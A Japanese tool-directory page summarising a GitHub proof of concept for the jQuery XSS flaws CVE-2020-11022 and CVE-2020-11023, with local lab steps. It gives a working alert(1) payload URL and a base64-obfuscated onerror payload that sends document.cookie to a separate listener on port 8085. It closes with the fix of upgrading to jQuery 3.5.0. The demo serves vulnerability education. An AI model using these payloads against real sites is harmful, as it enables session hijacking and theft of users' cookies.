Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0xaj2k/cve-2020-11022-cve-2020-11023
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHub0xaj2k/cve-2020-11022-cve-2020-11023

CVE-2020-11022-CVE-2020-11023

このCVEを実証するために素早くまとめた小さなもの

リポジトリを見る
354124年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-11022 CVE-2020-11023

jQueryのバージョン1.2以上、3.5.0未満では、信頼できないソースからのHTML(サニタイズ後であっても)をjQueryのDOM操作メソッド(例:.html(), .append()など)に渡すと、信頼できないコードが実行される可能性があります。この問題はjQuery 3.5.0で修正されました。

jQueryのバージョン1.0.3以上、3.5.0未満では、信頼できないソースからの要素を含むHTML(サニタイズ後であっても)をjQueryのDOM操作メソッド(例:.html(), .append()など)に渡すと、信頼できないコードが実行される可能性があります。この問題はjQuery 3.5.0で修正されました。

エクスプロイト

  1. index.phpページをPHPウェブサーバーでホストします。sudo php -S 127.0.0.1:80 を使って簡単にサーバーを立ち上げることをお勧めします。

シンプルなXSS

  1. パス http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E にアクセスします。
  2. 「Append via .html()」ボタンを押します。
  3. アラートが表示されるのを確認します。

image

Cookieの盗難

  1. 別のウェブサーバーをポート8085で起動します。これにはPythonを使用することをお勧めします。sudo python3 -m http.server 8085
  2. パス http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E にアクセスします。
  3. 「Append via .html()」ボタンを押します。
  4. Pythonのログを確認し、ログ内にCookieが表示されるのを確認します。

image

修正

このスクリプトでこのCVEを修正したい場合は、jQueryのバージョンを https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js に変更するだけです :)

ツールをダウンロード